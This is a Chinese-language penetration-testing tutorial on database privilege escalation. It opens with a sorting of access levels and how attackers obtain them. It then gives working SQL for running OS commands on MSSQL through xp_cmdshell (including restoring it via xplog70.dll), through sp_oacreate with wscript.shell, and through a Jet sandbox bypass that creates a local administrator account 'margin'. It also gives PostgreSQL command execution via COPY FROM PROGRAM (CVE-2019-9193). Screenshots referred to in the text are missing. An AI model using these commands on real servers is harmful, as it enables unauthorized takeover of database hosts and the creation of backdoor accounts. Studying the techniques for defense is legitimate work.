目录

基础知识数据库

1、需要具体掌握的权限？

2、常见权限获取方法简要归类说明？

3、常见权限获取后能操作的具体事情?

MSSQL权限提升案例

MSSQL-xp_cmdshell

MSSQL-sp_oacreate

MSSQL-沙盒漏洞

PostgreSQL数据库权限提升

CVE-2018-1058

CVE-2019-9193

---

基础知识数据库

1、需要具体掌握的权限？

后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等

2、常见权限获取方法简要归类说明？

后台权限：SQL注入,数据库备份泄露，默认或弱口令等获取帐号密码进入

网站权限：后台提升至网站权限，RCE或文件操作类、反序列化等漏洞直达Shell

数据库权限：SQL注入,数据库备份泄露，默认或弱口令等进入或网站权限获取后转入

接口权限：SQL注入,数据库备份泄露，源码泄漏，培植不当等或网站权限获取后转入

系统权限：高危系统漏洞直达或网站权限提升转入、数据库权限提升转入，第三方转入等

域控权限：高危系统漏洞直达或内网横向渗透转入，域控其他服务安全转入等

3、常见权限获取后能操作的具体事情?

后台权限:

常规WEB界面文章分类等操作，后台功能可操作类

网站权限：

查看或修改程序源代码，可以进行网站或应用的配置文件读取（接口配置信息，数据库配置信息等），还能收集服务器操作系统相关的信息，为后续系统提权做准备。

数据库权限：

操作数据库的权限，数据库的增删改等，源码或配置文件泄漏，也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。

接口权限：

后台或网站权限后的获取途径：后台（修改配置信息功能点），网站权限（查看的配置文件获取），具体可以操作的事情大家自己想想。

系统权限：如同在你自己操作自己的电脑一样

域控权限：如同在你自己操作自己的虚拟机一样

MSSQL权限提升案例

MSSQL-xp_cmdshell

xp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。

启用xpshell：

EXEC sp_configure 'show advanced options', 1

RECONFIGURE;

EXEC sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

关闭xpshell：

exec sp_configure 'show advanced options', 1;

reconfigure;

exec sp_configure 'xp_cmdshell', 0;

reconfigure;

获取到web权限后，通过查找系统中的文件获取数据库的账号密码

 

执行：

EXEC master.dbo.xp_cmdshell '命令'

如果xp_cmdshell被删除了，可以上传xplog70.dll进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'

 

MSSQL-sp_oacreate

主要是用来调用OLE对象，利用OLE对象的run方法执行系统命令。

启用：

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE WITH OVERRIDE;

EXEC sp_configure 'Ole Automation Procedures', 1;

RECONFIGURE WITH OVERRIDE;

关闭：

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE WITH OVERRIDE;

EXEC sp_configure 'Ole Automation Procedures', 0;

RECONFIGURE WITH OVERRIDE;

执行：

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'

执行whoami命令，将命令的结果写入到1.txt文件中

 

直接查看文件信息即可。 

  

 

MSSQL-沙盒漏洞

exec sp_configure 'show advanced options',1;reconfigure; 

-- 不开启的话在执行xp_regwrite会提示让我们开启，

exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;

--关闭沙盒模式，如果一次执行全部代码有问题，先执行上面两句代码。

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0; 

--查询是否正常关闭，经过测试发现沙盒模式无论是开，还是关，都不会影响我们执行下面的语句。

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode' 

 

--执行系统命令select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add")') 

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators margin /add")')

沙盒模式SandBoxMode参数含义（默认是2）

`0`：在任何所有者中禁止启用安全模式

`1` ：为仅在允许范围内

`2` ：必须在access模式下

`3`：完全开启

openrowset是可以通过OLE DB访问SQL Server数据库，OLE DB是应用程序链接到SQL Server的的驱动程序。

--恢复配置

--exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1; 

--exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure; 

--exec sp_configure 'show advanced options',0;reconfigure;

w

将沙盒模式设置为0(关闭沙盒模式)，防止部分命令在安全模式下调用

关闭沙盒模式

 

查询沙盒模式的等级

 

添加用户名

 

执行前后查看了两次用户名，发现第二次多了一个web用户在admin中

         

 

PostgreSQL数据库权限提升

CVE-2018-1058

PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”，管理员或具有“COPY TO/FROM PROGRAM”权限的用户，可以使用这个特性执行任意命令。

提权利用的是漏洞：CVE-2018-1058 CVE-2019-9193

连接-利用漏洞-执行-提权

首先监听对应的端口

 

利用navicat链接postgreSQL数据库，并进行执行代码(注意ip和端口) 

 当管理员使用postgreSQL命令时，监听的服务器获取到了敏感信息 

  

 

CVE-2019-9193

 直接连接数据库利用命令在navicat里执行即可。注意：需要数据库的管理员账户 

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM 'id';

SELECT * FROM cmd_exec;